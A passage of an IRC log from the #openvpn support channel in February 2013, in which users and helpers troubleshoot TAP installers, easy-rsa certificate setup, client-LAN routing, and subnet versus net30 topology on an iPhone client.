with the "create tap script" issue ... http://swupdate.openvpn.org/community/releases/tap-windows-9.9.2.exe 15:23 < havoc> dazo: cool, thanks 15:23 <@dazo> !factoids search windows 15:23 <@vpnHelper> 'windows_mobile', 'windows_problems', and 'windows' 15:23 <@dazo> !factoids search tap 15:23 <@vpnHelper> 'tap', 'mactuntap', 'wintaphide', 'tunortap', and 'obsdtap' 15:23 <@dazo> !tap 15:23 <@vpnHelper> "tap" is "bridge" is (#1) http://openvpn.net/index.php/documentation/faq.html#bridge1, or (#2) http://openvpn.net/index.php/documentation/miscellaneous/ethernet-bridging.html, or (#3) Bridging looks like a good choice to people who don't know how to set up IP routing, but to learn routing is generally far better., or (#4) useful for windows sharing (without wins server) and LAN gaming, anything where 15:23 <@vpnHelper> the protocol uses MAC addresses instead of IP addresses. 15:23 < havoc> won't help he on the silent installs, but goot enough for interactive stuff 15:24 <@dazo> havoc: you can't do /s on that installer? and provide some "enable this option" as well via the command line? 15:24 < havoc> don't know, haven't tried the tap installer alone yet 15:25 < havoc> is the functionality installed w/ 2.3.0 to add a TAP, if you just have the script? 15:25 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:25 < havoc> if so, then I just need to install the tap installer once, and copy the .bat 15:25 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:25 <@dazo> havoc: I don't know how this really works out, tbh 15:26 < havoc> np 15:26 <@dazo> I tend to stay away from Windows as much as I can 15:27 < havoc> must be nice :( 15:27 <@dazo> havoc: yeah, it is ... until a bunch of windows users complains about the same issue ... and no immediate solution is found :) 15:28 <@dazo> then those complains are worse than Windows :-P 15:28 < havoc> unfortunately most clients are windows :( 15:29 <@dazo> ahh ... that's why I so often stay away from this channel ;-) 15:30 -!- mezgani_ [~mezgani@41.140.214.40] has joined #openvpn 15:31 -!- p3rror [~mezgani@41.140.153.11] has quit [Ping timeout: 248 seconds] 15:35 -!- mezgani_ [~mezgani@41.140.214.40] has quit [Ping timeout: 248 seconds] 15:35 < rob0> I look in on the channel, but I don't answer the Windows questions. :) 15:35 <@dazo> I'm probably too soft .... 15:36 < rob0> I figure if the Windows community can't support themselves, let them fail. :) 15:37 < havoc> kinda defeats the purpose of making openvpn for anything other than linux then 15:39 < havoc> and this isn't about any community "supporting themselves", this is about a single app 15:39 -!- p3rror [~mezgani@41.250.232.206] has joined #openvpn 15:40 < EugeneKay> I missed the question, so I'll stick with "Patches welcome" 15:40 -!- KaiForce [~chatzilla@adsl-70-228-90-247.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 15:40 <@dazo> EugeneKay++ 15:42 < rob0> !sweet 15:42 <@vpnHelper> "sweet" is http://sweet.nodns4.us/ =( 15:53 < lickalott> dazo "creating certificates and keys" i was following this http://www.howtogeek.com/64433/how-to-install-and-configure-openvpn-on-your-dd-wrt-router/, but it's not working. I don't have an easy-rsa anywhere on my laptop or my server. 15:53 <@dazo> why do people use non-official guides ..... 15:53 <@dazo> lickalott: http://openvpn.net/index.php/open-source/documentation/howto.html#pki 15:54 <@vpnHelper> Title: HOWTO (at openvpn.net) 15:54 < lickalott> thats what I needed! 15:54 <@dazo> lickalott: easy-rsa can be installed manually ... it's just a bunch of scripts even 15:54 <@dazo> lickalott: https://github.com/OpenVPN/easy-rsa/archive/master.zip 15:55 < lickalott> i didn't want to come out and ask you to throw me a link i could've googled for (and in the process make it known that my google-fu sucks at times) 15:56 < lickalott> k. got some reading to do. thanks! 15:57 -!- s7r [~s7r@openvpn/user/s7r] has quit [Quit: Leaving.] 15:58 -!- mezgani_ [~mezgani@41.250.232.161] has joined #openvpn 15:58 < rob0> You definitely should not run easy-rsa on the server machine. Ideally keep your CA removed from the network. Also, I doubt a dd-wrt router will have adequate entropy for openssl work. 15:58 -!- brute11k1 [~brute11k@89.249.231.171] has quit [Quit: Leaving.] 15:58 <@dazo> +1 15:58 < rob0> key generation, certificate signing, et c. 16:00 -!- p3rror [~mezgani@41.250.232.206] has quit [Ping timeout: 248 seconds] 16:00 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 16:00 <@dazo> lickalott: if it is any comfort ... your google-fu is pretty average, at least you know what google is ... its just too many popping in here who seems to never have heard about that service too 16:03 -!- dgbaley27 [~matt@ucb-np1-210.colorado.edu] has left #openvpn [] 16:04 -!- mezgani_ [~mezgani@41.250.232.161] has left #openvpn ["Leaving"] 16:05 -!- p3rror [~mezgani@41.250.232.161] has joined #openvpn 16:09 < hg_5> hello, i have router connected as client to openvpn server, it is set to wisp mode, and clients are connected to it in different subnet (openvpn subnet: 10.9.0.x ,clients subnet connected to this router 192.168.7.x) is it possible to see those clients? 16:11 < rob0> !clientlan 16:11 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a 16:11 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 16:13 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 16:18 -!- dazo is now known as dazo_afk 16:23 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 16:26 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:32 -!- mezgani_ [~mezgani@41.249.36.240] has joined #openvpn 16:33 -!- p3rror [~mezgani@41.250.232.161] has quit [Ping timeout: 248 seconds] 16:57 -!- mezgani__ [~mezgani@41.248.110.86] has joined #openvpn 17:00 -!- mezgani_ [~mezgani@41.249.36.240] has quit [Ping timeout: 255 seconds] 17:02 -!- mezgani__ [~mezgani@41.248.110.86] has quit [Ping timeout: 248 seconds] 17:08 -!- AsadH is now known as zz_AsadH 17:18 -!- TheLaw [~law@irc.l4w.info] has joined #openvpn 17:44 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:44 -!- mode/#openvpn [+o krzee] by ChanServ 18:31 -!- zz_AsadH is now known as AsadH 18:37 -!- mode/#openvpn [+v-o pekster pekster] by pekster 18:50 -!- AsadH is now known as zz_AsadH 19:05 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 19:20 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 255 seconds] 19:22 -!- raidz is now known as raidz_away 19:24 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 19:25 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 256 seconds] 19:27 -!- corretico [~luis@190.211.93.38] has joined #openvpn 19:28 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 20:01 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:04 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:38 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 20:42 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:44 -!- gardar_ [~gardar@gardar.net] has quit [Read error: Operation timed out] 20:46 -!- gardar [~gardar@gardar.net] has joined #openvpn 20:48 -!- nameless` [~nameless@u1c.eu] has quit [Ping timeout: 252 seconds] 20:48 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has quit [Remote host closed the connection] 20:48 -!- kloeri [~kloeri@freenode/staff/exherbo.kloeri] has joined #openvpn 20:49 -!- nameless` [~nameless@u1c.eu] has joined #openvpn 20:50 -!- mnathani [~zee@198-84-231-11.cpe.teksavvy.com] has quit [] 20:52 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer] 20:57 -!- wertik_any [~wertik_an@unaffiliated/wertik-any/x-4132569] has joined #openvpn 20:57 < wertik_any> !welcome 20:57 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 20:57 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:10 -!- wertik_any [~wertik_an@unaffiliated/wertik-any/x-4132569] has quit [Ping timeout: 276 seconds] 21:23 -!- rkantos [robin@4e.fi] has quit [Remote host closed the connection] 21:48 -!- NChief_ [tomme@unaffiliated/nchief] has joined #openvpn 21:48 -!- thermoman_ [~thermoman@idle.foobar0815.de] has joined #openvpn 21:50 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 21:52 -!- _b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 21:53 -!- Netsplit *.net <-> *.split quits: Saviq, scoates, b00b, NChief, thermoman 21:53 -!- _b00b is now known as b00b 21:58 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 248 seconds] 21:58 -!- Devastator [~devas@177.99.152.211] has joined #openvpn 21:58 -!- Devastator [~devas@177.99.152.211] has quit [Changing host] 21:58 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 22:23 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 22:31 -!- brute11k [~brute11k@89.249.231.69] has joined #openvpn 22:46 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 22:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 23:05 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has quit [Ping timeout: 256 seconds] 23:46 -!- brute11k [~brute11k@89.249.231.69] has quit [Quit: Leaving.] 23:47 -!- Burgundy [~burgundy@5-12-190-68.residential.rdsnet.ro] has quit [Read error: Connection reset by peer] --- Day changed Tue Feb 05 2013 00:03 -!- brute11k [~brute11k@89.249.231.69] has joined #openvpn 00:33 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 00:51 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 00:53 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 252 seconds] 00:55 -!- ura [~ura@unaffiliated/ura] has quit [Ping timeout: 245 seconds] 00:56 -!- ura [~ura@unaffiliated/ura] has joined #openvpn 01:06 -!- _quadDamage [~EmperorTo@boom.blissfulidiot.com] has joined #openvpn 01:07 -!- _quadDam1ge [~EmperorTo@boom.blissfulidiot.com] has quit [Ping timeout: 245 seconds] 01:08 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn 01:08 < oomph> has anyone here gotten OpenVPN to run on a kindle fire? 01:09 < oomph> I know there is an APK available in the Android market, however the Kindles market is lacking. 01:12 -!- oyunokata [~rrinehart@209.163.177.130] has quit [Ping timeout: 248 seconds] 01:24 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has quit [Quit: oomph] 01:25 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn 01:27 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has left #openvpn [] 01:33 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Excess Flood] 01:34 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:04 -!- hazardous [~dbn@2001:470:8932:6855:4185::fe80] has quit [Ping timeout: 264 seconds] 02:05 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has joined #openvpn 02:05 < LEDfan> !welcome 02:05 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 02:05 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 02:06 < LEDfan> !goal 02:06 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 02:15 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 02:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 02:24 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:26 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 02:26 -!- Saviq [~Saviq@sawicz.net] has quit [Changing host] 02:26 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 02:26 -!- p3rror [~mezgani@2001:0:53aa:64c:386c:2f26:d607:4f60] has joined #openvpn 02:32 -!- RealRancor [~chris@p5B13D5E3.dip0.t-ipconnect.de] has joined #openvpn 02:45 -!- p3rror [~mezgani@2001:0:53aa:64c:386c:2f26:d607:4f60] has quit [Ping timeout: 245 seconds] 02:49 -!- RealRancor [~chris@p5B13D5E3.dip0.t-ipconnect.de] has quit [Quit: Leaving.] 02:57 -!- SpookZa [~SpookZA@197.87.128.172] has joined #openvpn 03:12 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:23 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 03:26 -!- brute11k1 [~brute11k@89.249.231.69] has joined #openvpn 03:27 -!- brute11k [~brute11k@89.249.231.69] has quit [Ping timeout: 264 seconds] 03:29 -!- funky1 [~funky1@ip51cf100e.direct-adsl.nl] has joined #openvpn 03:30 < funky1> hi all :) got a openvpn server on my ubuntu machine on the internet, i connect to it with my windows based OS client, all works well, but for some web addresses i'd like my windows client to not use the vpn connection but my real IP when I open those sites, is that somehow possible? 03:33 <+pekster> Using a proxy is a better choice for that instead of redirecting your traffic 03:34 <+pekster> You can't know in advance what the IP a DNS name will resolve to, which is required to do route-based exceptions. Additionally, Windows clients are not able to do policy routing 03:35 <+pekster> Why not use a proxy in your browser, set the proxy point to your VPN server, and then define domain-based rules in your proxy? I do the same thing with one of my VPN tunnels by using openvpn/tiny-proxy/Firefox+FoxyProxy 03:37 < funky1> thanks pekster, will think about the proxy suggestion :) 03:41 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 03:41 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 244 seconds] 03:42 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 03:52 -!- tyteen4a03 [~T4@n218250226180.netvigator.com] has joined #openvpn 03:52 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [] 03:53 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 03:55 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has quit [Ping timeout: 246 seconds] 04:07 -!- VunKruz [~hhhh@108-206-230-100.lightspeed.irvnca.sbcglobal.net] has joined #openvpn 04:23 -!- zz_AsadH is now known as AsadH 04:24 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has quit [Remote host closed the connection] 04:26 -!- plaisthos [~arne@openvpn/community/developer/plaisthos] has joined #openvpn 04:26 -!- mode/#openvpn [+o plaisthos] by ChanServ 04:27 <@plaisthos> If the guy asking for the apk for kindle fire comes back directed him here: http://plai.de/android/ and tell him that he should report back if it worked 04:27 <@vpnHelper> Title: Index of /android (at plai.de) 04:29 <+pekster> Sounds good 04:29 <+pekster> !kindle 04:29 <+pekster> Sounds like we need a new bot entry 04:30 <+pekster> krzee: ping on adding a new bot entry: !kindle as http://plai.de/android/ (and ask folks to report back if it worked.) 04:30 <@vpnHelper> Title: Index of /android (at plai.de) 04:51 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 04:59 -!- dazo_afk is now known as dazo 05:36 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 05:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 05:57 -!- niervol [~krystian@193.106.244.150] has quit [Read error: Connection reset by peer] 05:58 -!- niervol [~krystian@193.106.244.150] has joined #openvpn 06:14 -!- Porkepix [~Porkepix@157.138.188.184] has joined #openvpn 06:15 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:16 -!- funky1 [~funky1@ip51cf100e.direct-adsl.nl] has left #openvpn [] 06:30 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Quit: ZNC - http://znc.in] 06:39 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 06:39 -!- LEDfan [~quassel@94-226-126-193.access.telenet.be] has quit [Remote host closed the connection] 06:49 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 07:01 -!- julius_ [~julius@141.41.92.122] has quit [Ping timeout: 256 seconds] 07:02 -!- master_of_master [~master_of@p57B55202.dip.t-dialin.net] has quit [Ping timeout: 276 seconds] 07:04 -!- master_of_master [~master_of@p57B553B8.dip.t-dialin.net] has joined #openvpn 07:15 -!- blackmagic [~black@got.laid.using.blackmajic.org] has quit [Read error: Connection refused] 07:27 <@ecrist> !learn kindle as http://plai.de/android/ - Please report back if you have issues, or if it worked well. 07:27 <@vpnHelper> Joo got it. 07:27 <@ecrist> !kindle 07:27 <@vpnHelper> "kindle" is http://plai.de/android/ - Please report back if you have issues, or if it worked well. 07:27 <@ecrist> pekster: ^^^ 07:28 * plaisthos has no idea if that works or not :) 07:28 <@plaisthos> The new kindles are based on 4.0 ... so it may work 07:29 <@ecrist> !forget kindle 07:29 <@vpnHelper> Joo got it. 07:29 <@ecrist> !learn kindle as http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) 07:29 <@vpnHelper> Joo got it. 07:29 <@ecrist> :) 07:29 <@plaisthos> :D 07:31 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn 07:31 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has left #openvpn [] 07:51 -!- y4h0 [~yavor@78.128.23.17] has joined #openvpn 07:52 < y4h0> ls 07:52 < y4h0> hey 07:54 < y4h0> when i am starting openvpn i get a message Options error: --server directive network/netmask combination is invalid when starting why ? 07:54 < y4h0> here is my server.conf http://pastie.org/6058347 07:55 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 252 seconds] 07:56 < EugeneKay> Because your network/netmask combination is invalid. 07:56 < defsdoor> y4h0, server 192.168.9.0 255.255.255.0 07:56 -!- ade_b [~Ade@109.58.175.187.bredband.tre.se] has joined #openvpn 07:56 -!- ade_b [~Ade@109.58.175.187.bredband.tre.se] has quit [Changing host] 07:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 08:05 < havoc> http://www.isg.rhul.ac.uk/tls/ 08:05 <@vpnHelper> Title: Lucky Thirteen: Breaking the TLS and DTLS Record Protocols (at www.isg.rhul.ac.uk) 08:05 < havoc> that's probably been seen here already, but there it is 08:06 -!- b1rkh0ff [~b1rkh0ff@178.77.13.80] has quit [Ping timeout: 264 seconds] 08:09 -!- blackmagic [black@got.laid.using.blackmajic.org] has joined #openvpn 08:10 < havoc> no need to panic just yet though 08:10 < havoc> lotta deps to pull it off successfully 08:11 -!- blackmagic [black@got.laid.using.blackmajic.org] has quit [Client Quit] 08:17 < sam1> is it recommended to use ebtables to firewall network bridges? 08:18 -!- b1rkh0ff [~b1rkh0ff@178.77.7.143] has joined #openvpn 08:22 -!- scoates [~sean@iconoclast.caedmon.net] has joined #openvpn 08:23 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 08:27 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 08:28 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 08:28 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 08:28 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 08:28 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 08:29 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 08:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 08:46 -!- julius_ [~julius@141.41.92.122] has joined #openvpn 08:53 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 09:08 <@dazo> sam1: yes 09:14 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has joined #openvpn 09:16 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has quit [Client Quit] 09:22 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has joined #openvpn 09:22 -!- Porkepix [~Porkepix@157.138.188.184] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 09:25 -!- gee_totes [~lee@cpe-66-108-214-202.nyc.res.rr.com] has quit [Client Quit] 09:29 < sam1> dazo: any link regarding ebtables and what to isolate when it comes to vpn? 09:29 <@dazo> !notovpn 09:29 <@vpnHelper> "notovpn" is "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 09:30 <@dazo> sam1: try #netfilter 09:32 -!- nickanderson_afk is now known as nickanderson 09:34 -!- Holiday [~rjr162@128.118.15.39] has quit [Read error: Operation timed out] 09:42 * ecrist pokes mattock 09:50 -!- linuxthefish [linuxfish@br.freeBNC.net] has joined #openvpn 09:51 -!- linuxthefish [linuxfish@br.freeBNC.net] has left #openvpn [] 09:57 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 276 seconds] 09:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 10:03 -!- nickanderson is now known as nickanderson_afk 10:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:15 -!- raidz_away is now known as raidz 10:17 -!- AsadH is now known as zz_AsadH 10:22 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has joined #openvpn 10:29 -!- _AxS_ [~axs@gentoo/developer/axs] has joined #openvpn 10:31 < _AxS_> Hey all .. i've got a somewhat odd issue that I don't know how to debug. I've got an openvpn setup that's working well between my server and a couple of laptops. I just installed the openvpn-connect app on my iPhone, and set it up, and it works fine locally but when connecting remotely no traffic goes across the vpn. I can actually ping the vpn address of the phone from the server fine, but i can't contact the server from the phone. 10:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:33 < _AxS_> aw damn; i bet it is a routing issue. It seems my lan router has a default route to handle pointing traffic to the vpn gateway, so this explains why it's working fine locally (traffic isn't actually going out on the vpn, just in) 10:33 < kisom> _AxS_: Do you push the correct routes and all that? I use the iOS app and it works just fine 10:34 < _AxS_> kisom: the .ovpn file is identical to what I use on the laptops, so I would expect so. The log also -seems- to say yes. But I'm thinking it isn't. 10:37 < kisom> _AxS_: Is your device jailbroken? I know people have been having issues with jailbroken devices and oVPN. 10:38 < _AxS_> kisom: not jailbroken. I was actually starting to wonder if i needed to jailbreak. Good to know i don't. 10:39 < kisom> _AxS_: OK. To me it sounds more like a firewall issue since pinging works from the server to the phone 10:40 < _AxS_> ...i currently do not have anything on the server that pushes a route. 10:40 < _AxS_> kisom: if it's a firewall issue then it'd be the firewall -within- the phone, tho. 10:40 < kisom> There's no firewall in iOS afaik 10:40 < _AxS_> (since 10.8.x.x should never touch the regular lan, right?) 10:41 < kisom> Besides, it answers to ping, then routing works 10:41 < _AxS_> i can paste both my client and server configs, if it helps -- iirc they are both rather simple/standard tho 10:41 < kisom> Sure 10:42 < kisom> Also paste the output from iptables -nvL and iptables -t nat -nvL 10:45 < _AxS_> kisom: server config: http://bpaste.net/show/75268/ , client config: http://bpaste.net/show/75270/ 10:46 < _AxS_> kisom: the openvpn server isn't the router for the local network, so my NAT'ing etc isn't done there. I'm also not (at this time) allowing access from the vpn to more than the server itself. 10:53 < kisom> _AxS_: Looks good to me. 10:53 < _AxS_> kisom: ...and it's working fine for 3 laptops, as i mentioned.. just the iphone doesn't like it.. 10:54 < kisom> Well as I said, since the phone can reply to your servers ping requests then routing is fine 10:54 < kisom> I'm not exactly sure what you're trying to access on the server from the phone. 10:54 < _AxS_> i've got intranet services on a web server on 10.8.0.1 10:54 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 10:55 < _AxS_> ...and eventually i'd like to handle direct access to mail services that way too 10:55 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 10:55 -!- mode/#openvpn [+v hazardous] by ChanServ 10:55 < kisom> And you're able to access the web server via your laptops running openvpn? 10:56 < _AxS_> kisom: yep. Can also easily ssh-in that way too. on the laptops everything is ust working as expected. (laptops are a mix of linux and windows, btw) 10:56 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has joined #openvpn 10:56 -!- ade_b [~Ade@host-78-65-176-137.homerun.telia.com] has quit [Changing host] 10:56 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 10:58 < kisom> _AxS_: Have you tried switching to net30 instead of subnet? 10:58 < _AxS_> ..nope. need to look up that one 10:59 -!- zz_AsadH is now known as AsadH 11:00 < _AxS_> ah, right. Yeah my first openvpn setup was with 2.1 or 2.2, so 'topology subnet' was always available. I never tried the older 'net30' method 11:00 < kisom> I don't think that's the issue either, but I know there are some limitations with the iOS tun implementation 11:01 < kisom> So give it a try. I use net30. 11:02 < _AxS_> ..right. So i dropped the (useless, since i'm not NAT'ing 10.8.x.x) route from my lan router, and now pings from the server to the iphone go unanswered. this seems more inline with what is expected.. 11:15 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:36 < _AxS_> kisom: ok, net30 works. 11:37 < _AxS_> kisom: ..except I can't use net30 because two of the laptops that need access are out of the country for the next couple of months. However, at least now I have a lead for my research 12:04 -!- AsadH is now known as zz_AsadH 12:10 -!- thermoman_ is now known as thermoman 12:21 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 12:22 -!- brute11k1 [~brute11k@89.249.231.69] has quit [Ping timeout: 260 seconds] 12:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 12:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:41 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 12:41 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 255 seconds] 12:52 <+pekster> _AxS_: fwiw, you can push topology from the server. I leave it out on all my configs I design so it can be changed centrally 12:59 < _AxS_> pekster: yes I noticed that -- I'll be converting the clients to do that I think once I get access to them. 12:59 -!- zz_AsadH is now known as AsadH 12:59 < _AxS_> i'm still confused as to why topology subnet isn't working, though -- it's reported to work and is the -only- way for ipv6 to work... 13:00 < _AxS_> ..and of course, there are no errors in any logs to help ne debug this 13:01 <+pekster> Yea, no idea there, unless the tun driver doesn't support ip/subnet configuration thorugh the OS-level network commands called 13:02 <+pekster> (or does allow openvpn to call it and then fails to properly set it up...) 13:02 < _AxS_> ..which would seem odd to me, esp given that it works with net30 and i assume it's the same calls... 13:02 <+pekster> No, not at all 13:02 < _AxS_> oh? 13:03 <+pekster> net30 is a PtP setup using a peering between the 2 center IPs in a /30 for compatability with Windows sytems that required a subnet-based fake Ethernet network to connect 13:03 <+pekster> It's basically just there to support Windows clients before the 2.1 release came out that supprted subnet topology 13:04 <+pekster> net30 does do a "subnet-like" allocation of the /30 in Windows, but Unix/Linux actually sets up a PtP connection, not a /30 "subnet" (despite the directive's name) 13:05 < _AxS_> Ahhh... yeah that could be a difference. i wonder if for some reason it's doing that even with 'topology subnet' .. 13:05 <+pekster> Nope 13:06 <+pekster> See the manpage; your tun driver (and ifconfig or ip tool used to set it) requires support for that, however 13:06 < _AxS_> Although, given that there's a bunch of positive reports on using stuff like 'redirect-gateway' to route all traffic through to the vpn, i expect things are working properly (and using 'topology subnet') 13:06 <+pekster> It should spew errors if it lacks the support, but if the support is there but incorrectly implemented it would silently fail 13:07 <+pekster> Even though it's a tun (ie: OSI Layer 3, or IP) connection, 'subnet' topology sets an IP+mask, not the traditional PtP setup for tun 13:07 < _AxS_> ... does 'redirect-gateway' work in net30 ? 13:08 <+pekster> Yup, it works in any topology as it adjusts the routing table; openvpn is just the program calling the system commands to do that 13:11 -!- nickanderson_afk is now known as nickanderson 13:19 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 13:21 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 264 seconds] 13:21 <@krzee> anyone here know someone really good at seo? 13:22 < _AxS_> hm. does the server automatically push "topology subnet" if it's set in the config file? I dropped topology from the client .ovpn, added a push "topology subnet" in the server's config , now the client is erroring on duplicate topology entries.. 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:25 <+pekster> No need for the push since you're using --server (see how that directive expands) 13:25 < _AxS_> gotchya. 13:25 <+pekster> Just declare the topology and --server takes care of it. You only ever need to define the push if you self-expand that directive 13:26 <+pekster> 